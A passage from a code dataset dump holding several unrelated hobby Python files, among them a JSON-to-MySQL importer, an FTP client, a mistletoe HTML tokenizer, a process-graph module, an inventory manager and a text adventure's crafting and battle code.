getProvinceID(data['PROVINCE'])\n\t\t\telse:\n\t\t\t\tcaseProvinceID = 1\n\t\t\t\n\t\t\t# Check if 'REGION' exists\t\n\t\t\tif ('REGION' in data):\n\t\t\t\tcaseRegionID = getRegionID(data['REGION'])\n\t\t\telse:\n\t\t\t\tcaseRegionID = 1\n\t\t\t\t\n\t\t\t# Check if 'SEX' exists\n\t\t\tif ('SEX' in data):\n\t\t\t\tcaseSex = data['SEX']\t\n\t\t\telse:\n\t\t\t\tcaseSex = None\n\t\t\t\n\t\t\t# If one or more values are None, the SELECT query is different\n\t\t\tif (caseDate == None and caseAgeGroup == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex IS NULL'\n\t\t\t\tval = (caseProvinceID, caseRegionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None and caseAgeGroup == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex = %s'\n\t\t\t\tval = (caseProvinceID,caseRegionID,caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex IS NULL'\n\t\t\t\tval = (caseProvinceID, caseRegionID,caseAgeGroup)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseAgeGroup == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex IS NULL'\n\t\t\t\tval = (caseDate,caseProvinceID, caseRegionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseAgeGroup == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex = %s'\n\t\t\t\tval = (caseDate,caseProvinceID, caseRegionID,caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\telif (caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex IS NULL'\n\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex = %s'\n\t\t\t\tval = (caseProvinceID, caseRegionID,caseAgeGroup, caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tsql= 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex = %s'\n\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex)\t\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# Check if object already exists\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t# If the object is not in the DB, insert it\n\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t# If this is not the case, the numbers are not correct\n\t\t\t\tif (caseDate == None):\n\t\t\t\t\tsql = \"INSERT INTO cases(caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases) VALUES (%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\t\n\t\t\t\telif (caseDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = \"INSERT INTO cases(caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases) VALUES (%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - insertings cases\")\n\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlCase)\n\t\t\tprint(data)\n\t\t\texit()\n# End function read json cases\n# ----------------------------\n\ndef main():\n\treadHosp()\n\treadTest()\n\treadDeath()\n\treadCase()\n\nif __name__ == \"__main__\":\n \tmain()\n","sub_path":"JSON_2_MySQL/JSON2MySQL.py","file_name":"JSON2MySQL.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518754436","text":"#\n# @lc app=leetcode.cn id=17 lang=python3\n#\n# [17] 电话号码的字母组合\n#\n\n# @lc code=start\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n if not digits:\n return []\n\n dic = {\n '2':'abc', \n '3':'def', \n '4':'ghi',\n '5':'jkl', \n '6':'mno',\n '7':'pqrs',\n '8':'tuv', \n '9':'wxyz'\n }\n res = []\n\n def recursion(s, tmp):\n if s == \"\":\n res.append(tmp)\n return\n for letter in dic[s[0]]:\n recursion(s[1:], tmp + letter)\n\n recursion(digits, '')\n\n return res \n \n# @lc code=end\n\n","sub_path":"17.电话号码的字母组合.py","file_name":"17.电话号码的字母组合.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251182480","text":"import ftplib\nfrom io import StringIO\nimport math\n\nglobal totalSize\n\ndef ftp_connect():\n while True:\n site_address = input('Please enter FTP address: ')\n try:\n with ftplib.FTP(site_address) as ftp:\n ftp.login('SMartBird','12345')\n print(ftp.getwelcome())\n print('Current Directory', ftp.pwd())\n ftp.dir()\n print('Valid commands are cd/get/ls/exit - ex: get readme.txt')\n ftp_command(ftp)\n break # once ftp_command() exits, end this function (exit program)\n except ftplib.all_errors as e:\n print('Failed to connect, check your address and credentials.', e)\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n \n\n\ndef ftp_command(ftp):\n while True: # Run until 'exit' command is received from user\n command = input('Enter a command: ')\n commands = command.split() # split command and file/directory into list\n\n if commands[0] == 'cd': # Change directory\n try:\n ftp.cwd(commands[1])\n print('Directory of', ftp.pwd())\n ftp.dir()\n print('Current Directory', ftp.pwd())\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n if error_code[0] == '550':\n print(error_code[1], 'Directory may not exist or you may not have permission to view it.')\n elif commands[0] == 'get': # Download file\n try:\n \n ftp.retrbinary('RETR ' + commands[1], open(commands[1], 'wb').write)\n print('File successfully downloaded.')\n \n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n if error_code[0] == '550':\n print(error_code[1], 'File may not exist or you may not have permission to view it.')\n elif commands[0] == 'ls': # Print directory listing\n print('Directory of', ftp.pwd())\n ftp.dir()\n elif commands[0] == '..':\n ftp.cwd(\"../\")\n print('Directory of', ftp.pwd())\n ftp.dir()\n elif commands[0] == 'up':\n try:\n file=commands[1]\n print(file)\n myfile = open('/Users/Asus/Desktop/FTP/New folder/New folder (2)/'+ commands[1],'rb')\n ftp.storbinary(\"STOR \" + commands[1],myfile)\n print('File successfully Uploded.')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n print('File may not exist or you may not have permission to view it.')\n elif commands[0] == 'rename':\n try: \n newname = input('Enter New Name: ')\n ftp.rename(commands[1],newname)\n print('\\nSuccessfully Rename File: '+ commands[1])\n print('New Name is: '+ newname +'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'delete':\n try:\n ftp.delete(commands[1])\n print('\\nSuccessfully Deleted: '+ commands[1] +'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'mkd':\n try:\n ftp.mkd(commands[1])\n print('\\nSuccessfully Created: '+ commands[1] +'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'rmd':\n try:\n ftp.rmd(commands[1])\n print('\\nSuccessfully Removed: '+ commands[1] +'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'size':\n try:\n ftp.sendcmd(\"TYPE i\")\n sz = ftp.size(commands[1])\n \n print('\\nFile SIze of '+ commands[1] +' is: ', convert_size(sz) ,'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'move':\n try: \n newnamee = input('Enter new File path ex: dirB/hello.txt : ')\n newname = newnamee+commands[1]\n path = ftp.pwd()+commands[1]\n ftp.rename(path,newname)\n print('\\nSuccessfully Move File: '+ commands[1])\n print('New Path is: '+ newname +'\\n')\n except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n error_code = str(e).split(None, 1)\n print('###Someting Wrong###')\n elif commands[0] == 'exit': # Exit application\n ftp.quit()\n print('Goodbye!')\n break\n else:\n print('Invalid command, try again (valid options: cd/get/ls/exit).')\n\nprint('Welcome to Python FTP')\nftp_connect()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634147267","text":"\"\"\"\nMixin HTML tags support for mistletoe.\n\nInjection into the parsing process is achieved in the corresponding\nrenderer (mistletoe.html_renderer in this case.)\n\"\"\"\n\nimport re\nimport mistletoe.span_token as span_token\nimport mistletoe.block_token as block_token\n\n\n__all__ = ['HTMLBlock', 'HTMLSpan']\n\n\nclass HTMLBlock(block_token.BlockToken):\n \"\"\"\n Block-level HTML tokens.\n\n Attributes:\n content (str): literal strings rendered as-is.\n \"\"\"\n _last_tag = ''\n pattern = re.compile(r'<(\\S+).*?>')\n def __init__(self, lines):\n self.content = ''.join(lines) # implicit newlines\n\n @classmethod\n def start(cls, line):\n # single-line html token?\n if HTMLSpan.pattern.match(line.strip()):\n cls._last_tag = ''\n return True\n # multi-line html token?\n match_obj = cls.pattern.match(line)\n if match_obj:\n cls._last_tag = match_obj.group(1)\n return True\n return False\n\n @classmethod\n def read(cls, lines):\n line_buffer = [next(lines)]\n if not cls._last_tag:\n return line_buffer\n for line in lines:\n line_buffer.append(line)\n start = line.find('')\n if start != -1 and end != -1 and line[start+2:end] == cls._last_tag:\n break\n return line_buffer\n\n\nclass HTMLSpan(span_token.SpanToken):\n \"\"\"\n Span-level HTML tokens.\n\n Attributes:\n content (str): literal strings rendered as-is.\n \"\"\"\n pattern = re.compile(r\"<([A-z0-9]+?)(?: .+?)?(?: ?/>|>.*?<\\/\\1>)|\")\n def __init__(self, match_obj):\n self.content = match_obj.group(0)\n","sub_path":"mistletoe/html_token.py","file_name":"html_token.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620389129","text":"answers_test=[\"a\", \"a\", \"c\", \"b\"]\nanswers_right=[\"a\", \"a\", \"b\", \"\"]\nscore=0\n\nfor i in range(len(answers_test)):\n print(answers_test[i])\n\nfor test, right in zip(answers_test, answers_right):\n print(test, '-->', right)\n if test == right:\n score = score + 4\n print('score increased: ', score)\n if right == \"\":\n print('none')\n if test != right:\n if right != \"\":\n score = score - 1\n print('score decreased: ', score)\n else:\n print('score not changed: ', score)\n","sub_path":"1-1.py","file_name":"1-1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"218103037","text":"import networkx as nx\nfrom typing import List\nfrom ..data_structures.case import Case\nfrom ..utils import time_difference, extract_cases_time_and_trace\n\n\ndef normalize_graph(graph: nx.DiGraph) -> nx.DiGraph:\n \"\"\"\n Time and weight normalization for each edge in the graph.\n Time normalization is the mean time of an edge.\n Trace normalization is based on the graph weights\n\n Parameters\n --------------------------------------\n graph: nx.DiGraph,\n Graph to be normalized\n Returns\n --------------------------------------\n graph: nx.DiGraph,\n Normalized graph\n \"\"\"\n max_weight = max([attributes['weight'] for n1, n2, attributes in graph.edges(data=True)])\n for node1, node2, data in graph.edges(data=True):\n data['weight_normalized'] = data['weight'] / max_weight\n data['time_normalized'] = data['time'] / data['weight']\n\n return graph\n\n\ndef initialize_graph(graph: nx.DiGraph, case_list: List[Case]) -> nx.DiGraph:\n \"\"\"\n Initialize a graph based on the weights and time differences from a list of cases\n\n Parameters\n --------------------------------------\n graph: nx.DiGraph,\n Graph to be initialized\n case_list: List[Case],\n List of cases used to initialize the graph\n Returns\n --------------------------------------\n graph: nx.DiGraph,\n Initialized graph\n \"\"\"\n trace_list, time_list = extract_cases_time_and_trace(case_list)\n\n time_list = time_difference(time_list)\n\n for trace, time in zip(trace_list, time_list):\n for i in range(len(trace)-1):\n edges = (trace[i], trace[i+1])\n if edges not in graph.edges:\n graph.add_edge(*edges, weight=1, time=time[i])\n else:\n graph[edges[0]][edges[1]]['weight'] += 1\n graph[edges[0]][edges[1]]['time'] += time[i]\n\n return normalize_graph(graph)\n\n\ndef merge_graphs(process_model_graph: nx.DiGraph, check_point_graph: nx.DiGraph) -> nx.DiGraph:\n \"\"\"\n Receives two graphs and merge them.\n The first is the PMG (process model graph) and the second it the CP (check point) graph.\n The PMG, then, incorporates the second graph.\n Before the merge, 5% of the PMG's weight is decayed.\n\n Parameters\n --------------------------------------\n process_model_graph: nx.DiGraph,\n PMG graph\n check_point_graph: nx.DiGraph,\n CP graph\n Returns\n --------------------------------------\n process_model_graph: nx.DiGraph,\n PMG after merge\n \"\"\"\n for node1, node2, data in process_model_graph.edges(data=True):\n data['weight'] *= 0.95\n\n for node1, node2, data in check_point_graph.edges(data=True):\n path = (node1, node2)\n if path in process_model_graph.edges:\n process_model_graph[node1][node2]['weight'] += data['weight']\n process_model_graph[node1][node2]['time'] += data['time']\n else:\n process_model_graph.add_edge(*path, weight=data['weight'], time=data['time'])\n\n return normalize_graph(process_model_graph)\n","sub_path":"cdesf2/utils/graph_operation.py","file_name":"graph_operation.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155421705","text":"#!/usr/bin/env python3\n#! -*- coding: utf-8 -*-\nfrom tkinter import *\nimport os\ndef click1():\n\tos.system(\"python MyBase64GUI.py\")\ndef click2():\n\tos.system(\"start python Mydic.py\")\ndef click3():\n\tos.system(\"python Myqrcode.py\")\nroot=Tk()\nroot.title('Mytools')\nA=Button(root,text=\"Base64 Tools\",command=click1,height=5,width=30,activeforeground='blue')\nB=Button(root,text=\"Dictionary Tools(without GUI)\",command=click2,height=5,width=30,activeforeground='blue')\nC=Button(root,text=\"QR Tools\",command=click3,height=5,width=30,activeforeground='blue')\nA.pack()\nB.pack()\nC.pack()\nroot.mainloop()","sub_path":"FirstWeek/Mytools.py","file_name":"Mytools.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565804639","text":"#Create a function called tup2Dict. tup2Dict should take one\n#parameter: a list of tuples. You can assume each tuple in\n#the list has exactly two values.\n#\n#The function should return a dictionary where the first item\n#in each tuple is the key, and the second item in each tuple\n#is the corresponding value.\n#\n#For example:\n# colors = [(\"turquoise\", \"#40E0D0\"), (\"red\", \"#990000\")]\n# tup2Dict(colors) -> {\"turquoise\":\"#40E0D0\", \"red\":\"#990000\"}\n#\n#Hint: the previous exercise is very similar; this just turns\n#it into a function!\n\n\n#Write your function here!\ndef tup2Dict(tuplelist):\n rgb = {}\n for atuple in tuplelist:\n rgb[atuple[0]] = atuple[1]\n return rgb\n\n#The code below will test your function. It is not used for\n#grading, so feel free to modify it. As written, this should\n#print: {'turquoise':'#40E0D0', 'red':'#990000'}\n#Don't worry if it prints those in the reverse order; that's\n#still correct!\nprint(tup2Dict([(\"turquoise\", \"#40E0D0\"), (\"red\", \"#990000\")]))\n\n\n","sub_path":"Unit 4 Data Structures/Chapter 4.5 Dictionaries/4.5.2 Coding Exercise 2.py","file_name":"4.5.2 Coding Exercise 2.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558357236","text":"import json\n\ndef adding_item_data(oneDict, item_value, item_number):\n \"\"\"\n\n :param oneDict: Dictionary holding one item values\n :param item_value: integer describing a price per item\n :param item_number: integer describing amount\n :return:\n \"\"\"\n # Total value of current item + Total value of added stock of current item - total number of stock item\n oneDict[\"VALUE\"] = (float(oneDict[\"VALUE\"] * oneDict[\"NUMBER\"]) + (float(item_value) * float(item_number))) / (\n oneDict[\"NUMBER\"] + int(item_number))\n oneDict[\"NUMBER\"] += int(item_number)\n\n return(oneDict[\"VALUE\"], oneDict[\"NUMBER\"])\n\n\ndef adding_new_item_to_inventory(inventory, item_name, item_value, item_number):\n \"\"\"\n Goal: Adda new item to inventory list\n :param inventory:\n :param item_name:\n :param item_value:\n :param item_number:\n :return:\n \"\"\"\n newItem = {}\n newItem[\"NAME\"] = item_name\n newItem[\"NUMBER\"] = int(item_number)\n newItem[\"VALUE\"] = float(item_value)\n inventory.append(newItem)\n return inventory\n\ndef get_item_data_from_user():\n \"\"\"\n Goal: Ask user for item data and extract it from user input\n :return:\n \"\"\"\n user_input = input(\"item name, item value, item number\")\n user_input = user_input.split(\",\")\n return user_input[0], user_input[1], user_input[2]\n\ndef add(param1):\n \"\"\"\n Goal: Adding item data to inventory\n :param param1:\n :return:\n \"\"\"\n inventory = param1\n #format: A,item name, amount, price\n isFound = False\n item_name, item_value, item_number = get_item_data_from_user()\n for one_item in inventory:\n #print(oneDict)\n #If item is found make calculaton to get value of one item and add new stock to inventory stock.\n if item_name == one_item[\"NAME\"]:\n one_item[\"Value\"], one_item[\"NUMBER\"] = adding_item_data(one_item, item_value, item_number)\n isFound = True\n\n #If item not found in inventory add it to inventory\n if isFound == False:\n inventory = adding_new_item_to_inventory(inventory, item_name, item_value, item_number)\n\n return inventory\n\ndef selling_item_still_on_lager(oneDict, wantsToSell):\n \"\"\"\n Goal: Remove item data from inventory\n :param oneDict:\n :param wantsToSell:\n :return:\n \"\"\"\n oneDict[\"NUMBER\"] = oneDict[\"NUMBER\"] - wantsToSell\n # If amount after subtraction is 0 the value is also 0\n if oneDict[\"NUMBER\"] == 0:\n oneDict[\"VALUE\"] = 0\n\n return(oneDict[\"NUMBER\"], oneDict[\"VALUE\"])\n\ndef sell(param1):\n inventory = param1\n isFound = False\n item_name, item_value, item_number = get_item_data_from_user()\n for oneDict in inventory:\n #Find the item to subtract\n if item_name == oneDict[\"NAME\"]:\n isFound = True\n currentLager = oneDict[\"NUMBER\"]\n wantsToSell = int(item_number)\n\n #If amount after subtraction is >= 0\n if currentLager - wantsToSell >= 0:\n oneDict[\"NUMBER\"], oneDict[\"VALUE\"] = selling_item_still_on_lager(oneDict, wantsToSell)\n\n #If amount after subtraction would be bellow 0, make it 0 and tell the user num that can not be subtracted\n elif (currentLager - wantsToSell) < 0:\n oneDict[\"NUMBER\"] = 0\n oneDict[\"VALUE\"] = 0\n print(\"Subtracted as much as possible\\nThere was {0} on lager and you subtracted {1}.\\n\"\n \"I removed {2} and there is {3} left to be removed\".format(currentLager,\n wantsToSell, currentLager, (wantsToSell - currentLager)))\n\n #If the selling item has never been in the warehouse inform the user\n if isFound == False:\n print(\"Cant find {0}. {0} has never been in the warehouse!\".format(item_name))\n\n return (inventory)\n\n\n\n#Calculationg sums of inventory of total stock and total value of all items.\ndef get_current_stock(inventory):\n sumOfStock = 0\n sumOfValue = 0\n\n for oneDict in inventory:\n sumOfStock += int(oneDict[\"NUMBER\"])\n sumOfValue += float(oneDict[\"VALUE\"] * oneDict[\"NUMBER\"])\n\n return (sumOfStock,sumOfValue)\n\n\n\ndef save_to_file(inventory):\n with open('inventory.inv', 'w') as file:\n json.dump(inventory, file)\n file.close()\n\ndef load_from_file():\n with open('inventory.inv', 'r') as file:\n inventory = json.load(file)\n return inventory\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"450157253","text":"import discord\nfrom discord.ext import commands\n\n\nclass General:\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def ping(self):\n await self.bot.say(\"Pong!\")\n\n\ndef setup(bot):\n print(dir(General))\n bot.add_cog(General(bot))\n\n","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55373822","text":"from e_database import vpds_config as vpds_config_db\r\nfrom flask import jsonify\r\n\r\ndef search_vpds_config(request):\r\n res = vpds_config_db.search_vpds_config()\r\n \r\n return jsonify(results = res)\r\n\r\ndef update_vpds_config(request):\r\n req_dict = eval(request.data.decode('utf8')) \r\n model_type = req_dict['model_type']\r\n if model_type == '1':\r\n vp_data_slice_type = req_dict['vp_data_slice_type']\r\n vpds_config_db.update_vpds_config('vp_data_slice_type', vp_data_slice_type)\r\n \r\n cnn_training_target = req_dict['cnn_training_target']\r\n vpds_config_db.update_vpds_config('cnn_training_target', cnn_training_target)\r\n \r\n vp_data_training_num = req_dict['vp_data_training_num']\r\n vpds_config_db.update_vpds_config('vp_data_training_num', vp_data_training_num)\r\n \r\n normal_data_training_num = req_dict['normal_data_training_num']\r\n vpds_config_db.update_vpds_config('normal_data_training_num', normal_data_training_num)\r\n elif model_type == '2':\r\n jw_selected_data = req_dict['jw_selected_data']\r\n vpds_config_db.update_vpds_config('jw_selected_data', jw_selected_data)\r\n \r\n jw_vp_experiment_group_no = req_dict['jw_vp_experiment_group_no']\r\n vpds_config_db.update_vpds_config('jw_vp_experiment_group_no', jw_vp_experiment_group_no)\r\n \r\n jw_normal_experiment_group_no = req_dict['jw_normal_experiment_group_no']\r\n vpds_config_db.update_vpds_config('jw_normal_experiment_group_no', jw_normal_experiment_group_no)\r\n \r\n jw_experiment_report_data_length = req_dict['jw_experiment_report_data_length']\r\n vpds_config_db.update_vpds_config('jw_experiment_report_data_length', jw_experiment_report_data_length)\r\n \r\n min_vp_voca_same_rate = req_dict['min_vp_voca_same_rate']\r\n vpds_config_db.update_vpds_config('min_vp_voca_same_rate', min_vp_voca_same_rate)\r\n \r\n vp_threshold = req_dict['vp_threshold']\r\n vpds_config_db.update_vpds_config('vp_threshold', vp_threshold)\r\n \r\n less_threshold_decrease_point = req_dict['less_threshold_decrease_point']\r\n vpds_config_db.update_vpds_config('less_threshold_decrease_point', less_threshold_decrease_point)\r\n elif model_type == '3':\r\n doc2vec_selected_data = req_dict['doc2vec_selected_data']\r\n vpds_config_db.update_vpds_config('doc2vec_selected_data', doc2vec_selected_data)\r\n \r\n doc2vec_vp_experiment_group_no = req_dict['doc2vec_vp_experiment_group_no']\r\n vpds_config_db.update_vpds_config('doc2vec_vp_experiment_group_no', doc2vec_vp_experiment_group_no)\r\n \r\n doc2vec_normal_experiment_group_no = req_dict['doc2vec_normal_experiment_group_no']\r\n vpds_config_db.update_vpds_config('doc2vec_normal_experiment_group_no', doc2vec_normal_experiment_group_no)\r\n \r\n doc2vec_training_data_length = req_dict['doc2vec_training_data_length']\r\n vpds_config_db.update_vpds_config('doc2vec_training_data_length', doc2vec_training_data_length)\r\n \r\n doc2vec_experiment_report_data_length = req_dict['doc2vec_experiment_report_data_length']\r\n vpds_config_db.update_vpds_config('doc2vec_experiment_report_data_length', doc2vec_experiment_report_data_length)\r\n \r\n return jsonify('')\r\n","sub_path":"d_service/vpds_config.py","file_name":"vpds_config.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76675764","text":"from pprint import pprint\nimport random\n\ncurrent_activities = ', or teleport'\n\nclass Activity:\n def __init__(self):\n self.current_activities = ', heal, or teleport'\n self.current_location_text = ''\n\n def basic_crafting(self, inventory, conv_factor, item_to_craft):\n\n num_to_craft = int(input('How many? ').lower().strip())\n\n raw_material = inventory.crafting[item_to_craft]\n\n if item_to_craft not in inventory.player_inventory['items']['itemsids']:\n if inventory.player_inventory[raw_material] >= conv_factor * num_to_craft:\n inventory.player_inventory[raw_material] -= conv_factor * num_to_craft\n inventory.player_inventory[item_to_craft] += num_to_craft\n else:\n print('Not enough resources!')\n elif item_to_craft in inventory.player_inventory['items']['itemsids']:\n if inventory.player_inventory['items'][raw_material] >= conv_factor * num_to_craft:\n inventory.player_inventory['items'][raw_material] -= conv_factor * num_to_craft\n inventory.player_inventory['items'][item_to_craft] += num_to_craft\n\n def advanced_crafting(self, raw_materialA, raw_materialB, raw_materialC, raw_materialD, raw_materialE, costA, costB, costC,\n costD, costE, item_to_craft, inventory):\n if inventory.playerInventory[raw_materialA] >= costA and \\\n inventory.player_inventory[raw_materialB] >= costB and \\\n inventory.player_inventory[raw_materialC] >= costC and \\\n inventory.player_inventory[raw_materialD] >= costD and \\\n inventory.player_inventory[raw_materialE] >= costE:\n\n inventory.player_inventory[raw_materialA] -= costA\n inventory.player_inventory[raw_materialB] -= costB\n inventory.player_inventory[raw_materialC] -= costC\n inventory.player_inventory[raw_materialD] -= costD\n inventory.player_inventory[raw_materialE] -= costE\n inventory.player_inventory[item_to_craft] = True\n else:\n print('Not enough resources')\n\n def battle(self, enemy, enemy_name, attackA, attackB, lootA, ammo, inventory):\n battle_loop = True\n self.health_storage = enemy['health']\n while battle_loop == True:\n print('You have been encountered by a ' + str(enemy_name))\n print('Your health is at: ' + str(inventory.player_inventory['health']))\n print('What do you do?')\n print('Fight')\n print('Run')\n print('Item')\n command = input().lower().strip()\n if command == 'fight':\n percent_hit = random.randint(1, 20)\n if inventory.weapon['type'] == 'melee':\n if percent_hit not in enemy['armor']:\n enemy['health'] -= inventory.weapon['damage']\n print('You attack!')\n elif inventory.weapon['type'] == 'ranged':\n if ammo > 0:\n if percent_hit not in enemy['armor'] + [19, 20]:\n enemy['health'] -= inventory.weapon['damage']\n print('You attack!')\n ammo -= 1\n else:\n print('No ammo!')\n enemy_attack = random.randint(1, 20)\n if enemy_attack in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:\n inventory.player_inventory['health'] -= enemy[attackA]\n print('Enemy attacks!')\n elif attackB != 'none' and enemy_attack in [11, 12, 13, 14, 15]:\n inventory.player_inventory['health'] -= enemy[attackB]\n print('Enemy attacks!')\n elif attackB == 'none' and enemy_attack in [11, 12, 13, 14, 15]:\n inventory.player_inventory['health'] -= enemy[attackA]\n print('Enemy attacks!')\n if inventory.player_inventory['health'] <= 0:\n break\n if enemy['health'] <= 0:\n print('You defeated ' + str(enemy_name))\n inventory.player_inventory['EXP'] += enemy['EXP']\n print('You have ' + str(inventory.player_inventory['EXP']) + ' EXP!')\n if lootA != 'none':\n inventory.player_inventory[lootA] += 1\n battle_loop = False\n elif command == 'run':\n run_chance = random.randint(1, 2)\n if run_chance == 1:\n battle_loop = False\n print('Got away safely!')\n else:\n print('Can\\'t escape!')\n enemy_attack = random.randint(1, 3)\n if enemy_attack == 1:\n inventory.player_inventory['health'] -= enemy[attackA]\n else:\n inventory.player_inventory['health'] -= enemy[attackB]\n if inventory.player_inventory['health'] <= 0:\n break\n elif command == 'item':\n print('Which item would you like to use?')\n print(inventory.player_inventory['items'])\n command = input().lower().strip()\n if command == 'mushroom' and inventory.player_inventory['mushrooms'] > 0:\n inventory.player_inventory['health'] += 1\n inventory.player_inventory['mushrooms'] -= 1\n else:\n print('I don\\'t understand')\n else:\n print('I don\\'t understand')\n enemy['health'] = self.health_storage\n\n def region_check(self, location):\n if location.regions[location.current_location]['type'] == 'plains':\n self.current_activities = ', teleport, move, or mine calcium carbonate'\n self.current_location_text = 'in a big open plains'\n elif location.regions[location.current_location]['type'] == 'swamp':\n self.current_activities = ', teleport, move, or mine carbon'\n self.current_location_text = 'in a marshy swamp'\n elif location.regions[location.current_location]['type'] == 'mountain':\n self.current_activities = ', teleport, move, or mine calcium carbonate'\n self.current_location_text = 'on a steep mountain'\n elif location.regions[location.current_location]['type'] == 'forest':\n self.current_activities = ', teleport, move, or mine carbon'\n self.current_location_text = 'in a deep forest'\n\n def teleport(self, location, regions_list):\n if location.current_location == 'space_ship':\n location.current_location = location.regions['c3']['id']\n elif location.current_location in regions_list:\n location.current_location = 'space_ship'\n if location.current_location == 'space_ship':\n self.current_location_text = 'in your spaceship'\n self.current_activities = 'heal, or teleport'\n else:\n self.region_check(location)\n\n def main_loop(self, 